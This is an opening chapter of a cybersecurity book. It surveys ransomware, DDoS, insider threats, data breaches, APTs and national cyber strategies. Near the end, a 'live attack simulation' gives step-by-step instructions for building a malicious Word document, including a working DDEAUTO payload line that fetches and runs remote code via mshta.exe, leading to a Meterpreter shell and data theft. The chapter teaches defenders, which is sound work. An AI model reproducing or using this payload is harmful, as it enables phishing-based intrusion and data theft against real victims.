The information has always been key to competitive advantage and sustainable success. Information is usually created when a series of high-volume and trusted data is used to answer a simple question. Intelligence is developed by collecting information to present a forecast that can be used for decision-making processes. Intelligence gathering is the most powerful and effective way to predict the future. From ancient intelligence to today's artificial intelligence, from the world wars to today's cyberwar, the goal is always to be a step ahead of our adversaries.
Let's look at the real world. The Chinese government and there military, the People's Liberation Army (PLA), have been accused of stealing technology and trade secrets, often from private institutes in the US. You may think that China wants to destroy the US, but that's not true. China simply wants to be the superpower and wants to be a technology leader. Eventually, it wants every single American, and even the rest of the world, to be technology-dependent on the Chinese market. This results in a continuous stream of Chinese spying operations targeting multinational businesses and government institutes to gather trade secrets. Let's switch gears now. Political parties gather information through advanced analytics from their own citizens to predict upcoming election results. It signifies that the world is having a profound impact on the internet.
The rapid transformation to cloud computing, IoT, cognitive computing, and mobility are now managing most critical assets of organizations; however, the increasing number of interconnected applications and technologies also result in an increase in the number of exploitable vulnerabilities. Organizations are deploying several security measures to locate and fix such security vulnerabilities; however, this is a never-ending job for security forces. Nevertheless, top vulnerabilities can be prioritized by sorting them out with the potential threat, but this needs a high degree of threat intelligence practice.
Cybersecurity is a 20-year-old phenomenon, but in the past five years, it has become more challenging for defenders to protect themselves against emerging threats, such as zero-day exploits, crypto-ransomware, terabytes of DDoS attacks, multi-vector malware, and advanced social engineering.
This book is prepared to adopt a paradigm shift in security perception. Despite adding another layer of security, this is an attempt to change the security mindset at a fundamental level. One of the most popular technologies named after the internet is the blockchain; however, what makes the blockchain truly revolutionary is its potential for applications beyond cryptocurrencies. Today, there are numerous startups that are using blockchain technology to disrupt existing business models and industry verticals such as cloud hosting, financial services, the supply chain, healthcare, cybersecurity, and many more. This book will be useful for security experts, security product engineers, and even blockchain enthusiasts. This book focuses on taking readers on a tour of the current security threat landscape and is a practical approach for overcoming some of the most critical security challenges with blockchain technology.
In this chapter, readers will learn about the following topics:
- The current threat landscape
- How defenders, including government bodies and businesses, are preparing themselves to defend their assets from adversaries
- Live attack simulation to perform data exfiltration from a remote machine
In the new era of cyberspace, technology transformation has been a core factor for continuous security innovation and operations. In the world of connected vehicles, IoT, mobility, and the cloud, it opens up a focal point for cybercrime, targeted attacks, and industrial espionage. Once an attacker finds a vulnerability and determines how to access an application, they have everything they need to build an exploit for the application, and so it is critical to develop strong vulnerability management. Remember, the effectiveness of vulnerability management depends on the organization's ability to keep up with emerging security threats and models.
Security systems won't make an impact if employees are lured into clicking on a malicious link they were sent over email. Social engineering has proven to be an effective way to get inside a target network, and security forces face endless challenges in identifying malicious entry. Back in the old days, before Facebook and LinkedIn, if you needed to find information on organizations, you weren't going to get a lot information on the internet, and thus the use of social networking sites has made social engineering attacks easier to perform.
Ransomware is malware in which information on a victim's computer is encrypted and payment is demanded before granting them access. Ransomware is one of the most trending and high-return types of crimeware. It has attracted an enormous amount of media coverage in the past two years, mainly because of WannaCry, NotPetya, and Locky. WannaCry ransomware was spread rapidly across a number of systems worldwide in May 2017. It targeted several high-profile organizations including the UK's National Health Service, Spanish telephone giant Telefonica, French automobile leader Renault, US leading logistics company FedEx, Japanese firm Hitachi, and many more.
The ransomware author hosts the service over the dark web, which allows any buyer to create and modify the malware.
The dark web is a part of the internet that can't be fetched with a search engine but needs a special type of anonymity browser called Tor. In other words, the dark web carries unindexed data that's not available to search engines. The Tor browser basically routes the user information through a series of proxy servers that makes user identity unidentifiable and untraceable. Dark websites look similar to ordinary websites, but there are some differences in the naming structure. Dark websites don't have a top-level domain (TLD) such as
.co; rather, they just use websites that end with
As per the cybersecurity business report, ransomware damage costs are predicted to hit 11.5 billion by 2019. There are several driving factors behind the growing operation of ransomware globally. To earn faster, cybercriminals have stopped making malware themselves and started leveraging Ransomware-as-a-service (RaaS), which is available over the dark web marketplace.
These marketplaces don't just reduce the effort for expert criminals, but they also allow non-technical criminals or script kiddies to conduct ransomware operations.
The attacker produces a ransomware program with a preconfigured timer that ensures the destruction of data if a ransom is not paid before the specified time. Attackers also share a payment procedure, which is mostly through a Bitcoin wallet (since a digital cryptocurrency wallet provides anonymity).
WannaCry attacks were the biggest ransomware attacks and occurred in May 2017. WannaCry made use of a vulnerability in the Windows OS, first identified by the NSA, and then made publicly available through Shadow Brokers. It was designed to exploit a vulnerability in Windows SMBv1 and SMBv2, so that one moves laterally within networks. By May 24, 2017, more than 200,000 computer systems were infected in 150 countries.
NotPetya is another flavor of ransomware attack, which was launched in June 2017. The NotPetya ransomware apparently resembles the Petya virus in several ways: it encrypts the file and shows a screen requesting Bitcoin to restore the files. The original infection method was backdoor planted in M.E.Doc (a leading Ukrainian accounting company's software). After compromising the system through the M.E.Doc software, NotPetya used tools such as EternalBlue and EternalRomance to spread across network. It also took advantage of a tool called Mimi Katz to find administration credentials in the compromised machine.
SimpleLocker was the first ransomware attack that did not affect any computer systems, but affected several mobile phones. The choice of OS that the hackers preferred was Android, and the origin of this ransomware was tracked to Eastern Europe. The Trojan was targeting SD cards slotted into tablets and handsets, automatically crawling the entire set to get certain files and then demanding cash to decrypt the data. The virus entered the devices through Google Play Store. Once installed, the virus would scan the affected device for various file types and encrypted those using an Advanced Encryption Standard (AES), changing the file extensions to
.enc. It also used to collect various other information from the respective device, such as the IMEI number, device model, and manufacturer, and sent this to a C2 server. With the latest versions of this virus, hackers can even access the device camera and display a picture of the victims to scare them into paying the ransom. This threat is still lurking out there.
Within a year of CryptoLocker, a new threat came into existence, TeslaCrypt. At the start, many believed it to be one of the dimensions of CryptoLocker, but later it was given a new name, TeslaCrypt. This ransomware targeted a different set of people: hardcore gamers. TeslaCrypt targeted and affected the ancillary files that are associated with video games. This contained saved game files, maps, any game-related downloadable content, and so on. The uniqueness of this ransomware was that the creators of this ransomware constantly improved the impact of the Trojan and filled the loopholes that were there while the attack was ongoing.
CryptoLocker is grand-scale ransomware, and is believed to have been first posted on the internet on September 5, 2013, cultivated through an email attachment and over the Gameover Zeus botnet. It exerted influence on systems running on Microsoft Windows, and was spread through malicious email attachments and used to encrypt certain types of files stored on the local and network drives of a user, using RSA encryption. CryptoLocker was removed in late May 2014 through the Tovar operation, whichtookdown the Gameover Zeus botnet. It was reported that CryptoLocker successfully extorted more than $3 million from victims.
A DDoS attack is a malicious attempt to disrupt the legitimate user traffic of a server by overwhelming it with a flood of random traffic. DDoS differs from DoS by its distributed nature, attacking a target from several independent networks of compromised systems. These compromised computer systems are called bots, and a botnet refers to a group of such bots under the control of the same malicious actor.
DDoS attacks have become a frequent hazard, as they are commonly used to take revenge, conduct extortion, activism, and even for cyberwar. In October 2016, leading ISP Dyn's DNS was bombarded by a wave of DNS queries from millions of bots. The attack was executed by the Mirai botnet, and was composed of over 100,000 IoT devices.
There are numerous theories about the attack launched on October 26, 2016 on Dyn's DNS infrastructure. One of the most sensitive and highest impact DDoS attacks was noted to be against Dyn, a US-based DNS service provider, that caused several major websites including Twitter, Reddit, GitHub, Amazon, Netflix, PayPal, and many more to be inaccessible by a major part of country. There are numerous theories and claims as to who could be behind this. Security researchers pointed the finger of blame at script kiddies; however, there was also a claim by a hacker group, Jester, that the Russian government was behind the attacks. The hacker group Jester defaced the Russian foreign ministry against a Democratic National Committee (DNC) hack.
This didn't just stop there; there have been some high-profile damages as of late as well. The political crisis in Qatar led to a DDoS attack on Al Jazeera's website. France's presidential election was disrupted by attacks on the Le Figaro and Le Monde websites.
You could launch DDoS attacks by paying $10 an hour, $200, or $600-$1200 for an entire week. Several attackers on the dark web are offering DDoS for hire services that make launching DDoS attacks easy.
Someone who is looking to bombard their targets with a burst of heavy traffic gets charged for every second of botnet use rather than an hourly fee.
Attackers can compromise a computer and make their own bot. These bots are used to conduct reconnaissance, web page crawl, and even DDoS attacks. It is important to understand that countries that have a larger number of compromised systems should be aware of their global risk index. The following is a diagram of the global DDoS threat landscape in Q2 2017 by a leading DDoS protection provider called Incapsula:
33% of businesses around the world had been affected by DDoS attacks in 2017 alone. The number doubled when compared to 2016, wherein double the number of businesses were affected by DDoS attacks.
Any form of threat can originate from inside an organization, and it's not just limited to an employee with malicious intent; it can even be contractors, former employees, board members, stockholders, or third-party entities.
- Has or had authorized access to an organization's network, system, or data
- Has intentionally exceeded or intentionally used that access in a manner that negatively affected the confidentiality, integrity, or availability of the organization's information or information systems
Before this can be described, its is important to understand the need for it, and this need was indicated by the US Department of Defense (DoD) in 2000, which is also when research by the CERT division was initiated. For an insight into the insider threat profile and its corresponding behavior, check out the link at https://ccdcoe.org/sites/default/files/multimedia/pdf/Insider_Threat_Study_CCDCOE.pdf.
A malicious threat that comes from within an organization, such as from employees, former employees, partners, associates, and so on, does need not come from outside to affect the systems of the organization. This attack is more menacing than that of other malware as this comes from people who have access to the main systems, and they have knowledge that allows them to bypass security in a legitimate manner. Insider threats exist everywhere. If someone says that they are not prone to an insider threat, then they may not actually know what one is and how fatal it can be for an organization. A so-called insider may try to access confidential files for personal gain. This gain can be anything from selling information to competitors to stealing it for the insider's own personal use. The attrition rate in any organization is at a considerable level. People leave and join companies every year or two. This serves as a motivation for employees to keep certain information to themselves, as employees think that they have the right to hold on to such information just because of the fact that they had been working on that piece of information for a considerable amount of time. Talking about insider threats, not even the US government is free from insider threats. A report published in 2012 stated that most insider threats actually take place during an employee's working hours. Since technology has made it easier to identify where the breach or the attack started, there is no evidence, and the number of culprits were not identified in all the cases.
In 2017, a study by the Ponemon Institute called the Cost of Cyber Crime Study showed that the average cost of a data breach is currently $3.62 million globally, which is actually a 10% decline from 2016.
Data breaches may involve the leaking of sensitive corporate documents, technical blueprints, intellectual property, trade secrets, or even emails. This has always been massive in number and has an even bigger impact on businesses. Sophisticated attackers are capable of weaponizing malware highly tailored for the target and they are also managing to deliver the malware silently.
As per Mandiant's M-Trend 2017 report, most victim organizations were notified about the breach by people other than their own staff. More than 53% of breaches were discovered by an external source. Organizations should have a proactive breach management plan to detect the breach before getting notified by an outsider. The earlier it is detected, the more money organizations can save. The Ponemon Institute also suggested that organizations should aim to identify a breach within 100 days. The average cost of detecting a breach within this time is $5.99 million, but for those who don't have the tools to detect this, the average cost rose to $8.70 million. There are several ways data breaches happen, and the following are some of the most common reasons:
- Malicious attacks: Adversaries can launch a malware or malware-less attack, leveraging application vulnerabilities to exfiltrate sensitive information.
- Weak security systems: Attackers have became more advanced and persistent in nature. Attackers can use stolen credentials to look like legitimate users in the network and hence bypass existing security systems such as firewalls, intrusion prevention system (IPS), and endpoint security.
- Human error: As per a Verizon Data Breach investigation report in 2017, 88% of data breaches involve human error. Human error is something that all organizations have to deal with.
Some of the most notable recent data breaches are as follows:
- Equifax in September 2017: Equifax, one of the three largest credit agencies in the US, suffered a breach that affected 143 million consumers. An unknown threat group were successful in compromising Equifax online services by exploiting the vulnerability of Apache Struts CVE-2017-5638. Due to the sensitivity of the stolen data, including Social Security Number (SSN) and driving license numbers, this was one of the worst breaches of all time.
- Verizon in July 2017: Around 14 million of Verizon's subscribers may have been affected by the data breach. The compromised server was managed by the Israel-based NICE system.
- Edmodo in May 31, 2017: More than 78 million users had their information stolen from the education platform Edmodo. This was publicly notified when a hacker, known as nclay, was found selling 77 million Edmodo accounts on the dark web for $1,000.
- Verifone in March 7, 2017: Verifone, the leading maker of point of sale (POS) credit card terminals used in the US, discovered a massive data breach of its internal network. Sources indicate that there is evidence that a Russian hacking group was involved in the breach.
The consequences for businesses that experience data loss of their customers or partner's information, or any other confidential data, are severe and growing. Ponemon Institute, an independent security research company, has conducted a survey of data breach victim organizations to find out the impact of data breaches:
- Financial loss: Around 113 listed companies that experienced a data breach had their stock price drop an average of 5%, which resulted in a loss of their customer base
- Brand reputation loss: 61% of CMOs believe that the biggest cost of a data breach is the loss of a brand's value
- Customer trust loss: Consumers trust financial institutes, healthcare providers, and even government departments, to preserve their personal information and privacy
To get an insight into each impact, take a look at the following Ponemon Institute report from 2017: https://www.centrify.com/media/4772757/ponemon_data_breach_impact_study_uk.pdf.https://www.centrify.com/media/4772757/ponemon_data_breach_impact_study_uk.pdf
- Advanced: It is an advanced attack because it is made up of a broad spectrum of infection vectors and malware technologies that are available to the attacker, which are blended together to result in the successful compromise of a system.
- Persistent: It is persistent because the threat of being compromised is always there.
- Threat: This is not a typical, run-of-the-mill system compromise. This attack poses a real threat to the target, not only because it is backed by highly organized, well-funded, and motivated criminal elements, but also because if the attack is successful, it can have dire consequences for the target way beyond a normal system cleanup.
With technological advancements, new ways have risen to stalk corporate entities and any business. This is done in the form of APT. APT can be described as an attack on the network of an organization, which allows unauthorized people to be in the network for a long period of time without being detected.
APTs are different than regular cybercriminals based on the selection of a target, the goal, and human factors:
- Targets: They are chosen based on financial, political, geopolitical, surveillance, and security intelligence interests to gain high-value information
- Goal: The goal of an APT is not to simply get in and get out, but to gain prolonged access to the network's resources and keep themselves undetected by security administrators
- Human factors: This is a critical element for the entire APT operation, since the operation can occur through spear phishing or even insider threats
For more information on data exfiltration, follow the link at http://about-threats.trendmicro.com/cloud-content/us/ent-primers/pdf/how_do_threat_actors_steal_your_data.pdf.
After understanding the emerging threat landscape and some of the most effective cyberattacks, it is important to work on our own defense. These threat groups have got everything they need to discover an organization's assets and then find the vulnerabilities to build their weapons accordingly. This leads to a huge concern for organizations that have been non-adaptive, sometimes for more than decades, but let's accept the fact that there are a good number of bodies who have been brilliant in achieving cyber hygiene and better cyber defense ecosystems. Let's focus on some of these bodies, including governments and businesses.
Government electronic systems have been targeted by foreign security agencies to gather intelligence. With the growing use of interconnected technology, government systems are also facing challenges in increasing attack surfaces. It is important that government authorities become better at protecting their critical assets.
US President Donald Trump signed an executive order on May 11, 2017 that covers strengthening the cybersecurity of the federal network, emphasizing accountability, an adaptation of the framework to improve its critical infrastructure, and modernizing existing cybersecurity systems. The DoD has also presented its own strategy on strengthening cyber defense and cyber deterrence postures, and this includes three primary cyber missions, as shown in the following screenshot:
Cyber mission force plan to form 133 teams by 2018
To understand more about the DoD's strategy on strengthening its cyber defense and cyber deterrence posture, follow the link at https://www.defense.gov/News/Special-Reports/0415_Cyber-Strategy/.https://www.defense.gov/News/Special-Reports/0415_Cyber-Strategy/
With the National Cyber Security Strategy (NCSS) 2016-2021, the United Kingdom's government has planned to make its country secure and resilient. This vision is summarized in the following three objectives:
- To defend cyberspace: This is used to ensure that UK networks, data, and systems are protected and resilient. From this, UK citizens, corporations, and public institutions should have enough expertise and the ability to defend themselves.
- To deter adversaries: This is used to detect, understand, investigate, and disrupt cyber threats against the UK.
- To develop its capabilities: With its self-sustaining pool of talent, it provides the necessary skills to help UK nationals across public and private sectors.
To get an insight into the UK NCSS program, follow the link at https://www.gov.uk/government/publications/national-cyber-security-strategy-2016-to-2021.https://www.gov.uk/government/publications/national-cyber-security-strategy-2016-to-2021
The European Union Agency for Network and Information Security (ENISA) serves as a center of expertise and excellence for both member states and EU institutions related to network and information security. There are some major notable initiatives, such as the Annual Privacy Forum (APF), ENISA Threat Landscape (ETL), and Cyber Europe—a pan-European exercise to protect the EU against coordinated cyberattacks.
In 2018, General Data Protection Regulation (GDPR) will replace the Data Protection Directive 95/46/EC with the following changes under its increased territorial scope: penalties, consent, breach notification, right to access, right to be forgotten, data portability, privacy by design, and data protection officers. To get an insight into each vertical of GDPR, visit the link at https://www.eugdpr.org/key-changes.html.
In February 2017, the Indian government's Computer Emergency Response Team (CERT-In) launched Cyber Swachhta Kendra, a Botnet Cleaning and Malware Analysis Center to create a secure Indian cyberspace through detecting and cleaning bots in user endpoints. To know more about India's initiative on the bot cleaning program and how other bodies are helping the government to achieve this goal, visit the link at http://www.cyberswachhtakendra.gov.in/.http://www.cyberswachhtakendra.gov.in/
With the rapid adaptation of mobility, cloud, and IoT, businesses are getting ever more exposed to potential threats. In fact, some of the most trending technologies such as Bring Your Own Device (BYOD) make the probability and severity of insider threats even higher. Even after spending millions of dollars on preventative security, it still never gives complete assurance, and this has made organizations explore various emerging security defense technologies to detect and combat advanced threats that are successful in bypassing existing security systems. In many multinational organizations, the Chief Information Security Officer (CISO) has got multiple hats to wear at a time. In 2018, every CISO will be making some critical decisions regarding their organization's security.
Some of the emerging security defenses are mentioned here.
- Detecting threats with the continuous monitoring of endpoints
- Collecting and investigating logs and comparing and correlating them with historical events from each endpoint's activity
- Responding to the dangerous attempts of resources and removing them from the network
- Killing unauthorized processes to put the endpoint in a normal state
Deception has been used by the ancient military to in the world wars, and now this time in the world of cyberspace. In a nutshell, this is a technology that allows attackers to penetrate a decoy target system. With deception, enterprises can detect attackers and gather insights into their behavior and artifacts, which will then help improve their defense. This can be extended with multilevel stacks, including network devices, endpoints, and applications.
CTI is a way of analyzing the capability of adversaries. In cyberspace, it is often delivered in the form of an indicator of compromise (IOC), which includes malicious IP addresses, domain names, hashes, and so on. It is critical for organizations to understand their assets, people, and each connected third party so that they can prepare their own threat intelligence and plan to strengthen their defense.
In recent attacks, adversaries have run arbitrary code that is executed from a Microsoft Word document without the use of any macros or scripts. This technique is a legitimate Microsoft Office functionality called Dynamic Data Exchange (DDE).
Let's try to see this attack from a cyber kill chain perceptive. The Cyber kill chain is used to describe the attack stages:
- Reconnaissance: This is a planning phase where the attacker gathers information about something through observation or other detection methods. Cyberattack planning and reconnaissance often include conducting research about the target, usually with open source information gathering tools, such as Google and Shodan, as well as through searches of publicly available data, such as public announcements and social media, company profiles for email, and email harvesting.
- Weaponization: In this stage, a threat actor plans for the right attack method. The threat actor can even plan to exploit an employee by phishing their email or even with a drive-by download attack. In our example, first we will create a malicious document. In the blank document, go to the
Field...tab, as shown in the following screenshot:
Field names dialog box, select the
=(Formula) option to insert our DDE exploit code:
After this, you will see a field in the document with an error:
!Unexpected End of Formula. Right-click on that field, and choose the
Toggle Field Codes option. You need to do this to craft a DDE Object payload in the text field, which will start the malware or any code of our choice when the document is opened:
In the text field, enter the following code:
DDEAUTO C:\Programs\Microsoft\Office\MSword.exe\..\..\..\..\windows\system32\mshta.exe "http://192.168.1.101:8080/8b0HTF3MdgqYqgK
Then, save the document with any name of your choice, such as
- Delivery: Endpoints are the primary means of delivery, whether through a drive-by download from a website, a targeted phishing attack, or an infection through an employee-owned device through a secure virtual private network (VPN).
- Exploitation and installation: At this stage, the attacker will take advantage of software or human weakness to get the payload to run. In DDE exploitation, adversaries send an email that contains the malicious document. When the user runs that document, the adversaries will get the reverse shell of the victim's machine.
Let's see how the adversaries made the exploits during the weaponization stage and how they gained access to the victim's machine. The adversaries created the malicious payload document and sent it to the victim through an email. Take a look at the following screenshot:
When the user opened the document sent by the adversaries, the payload was executed after one error message, as shown in the following screenshot:
If the user chooses to start the malicious document, the payload will be executed and a Meterpreter session will open:
Action on objectives: This is how the threat actor is successful and gains access to the organization's sensitive files. The adversary tries to exfiltrate the data from the victim's machine. There are many confidential files here that the adversaries try to exfiltrate:
The adversaries take a screenshot of what the victim is doing and try to find out what process is running on the machine, as shown in the following screenshot:
Every organization has to be a part of this never-ending race against cyber attackers. If you fail to keep yourself ahead of your adversaries, you are likely become the victim of attacks. In the coming years, defenders have to prepare themselves for some of the emerging security challenges and threats. These are as follows:
- Slow security adaptation: Unlike networking and cloud transformation, cyber security solutions are not evolving at the expected rate. The traditional network segmentation has been replaced with a simplified and flat architecture, removing lots of network complexity. However, security solutions still use the traditional zone-based approach to mitigate threats.
- Human error: As per the IBM Security service report, more than 95% of investigated cyber incidents occurred due to human errors, such as system misconfiguration and insufficient patch management.
- Third-party vendor security risk: In the world of interconnected businesses, organizations have to let other organizations store and use their information for better business operations, but this can also lead to a bigger risk. If a third party gets compromised, the organization is at risk of losing business data. Most supply chain attacks use sophisticated attack vectors that manage to bypass existing security systems.
After understanding the current threat landscape, defender's perspective, a live attack simulation, and the root cause of security failure, it seems very clear that there is no silver bullet for data breaches and other advanced targeted attacks. Adversaries are changing their weapons and tactics in regard to the changes in technology and business processes, and with this, defenders are aggressively exploring various security tools. It is also clear that attackers do not need to be sophisticated to perform a sophisticated data breach; they simply have to be opportunists. With the open source tools and free online reconnaissance platforms available, threat actors are able to discover assets and their corresponding vulnerabilities.
In the next chapter, you will learn about some effective ways to deploy cyber security systems.
The world of cyberspace always leaves room for questions about the real risks to businesses and organizations, achieving better defensive strategies, and situations where security can go wrong. Some of the most widely asked questions are as follows:
- How do you keep an organization updated with an adversary's capabilities in cyberspace?
- How do you prepare effective cyber threat intelligence?
- How do we adapt to the emerging cyber security technologies?
Consider the following links for further reading:
- Learn more about threat profiles and capabilities at https://ccdcoe.org/sites/default/files/multimedia/pdf/Insider_Threat_Study_CCDCOE.pdf.
- EU GDPR 2018 at https://www.eugdpr.org/key-changes.html.
- US DoD cyber mission force program at https://www.defense.gov/News/Special-Reports/0415_Cyber-Strategy/.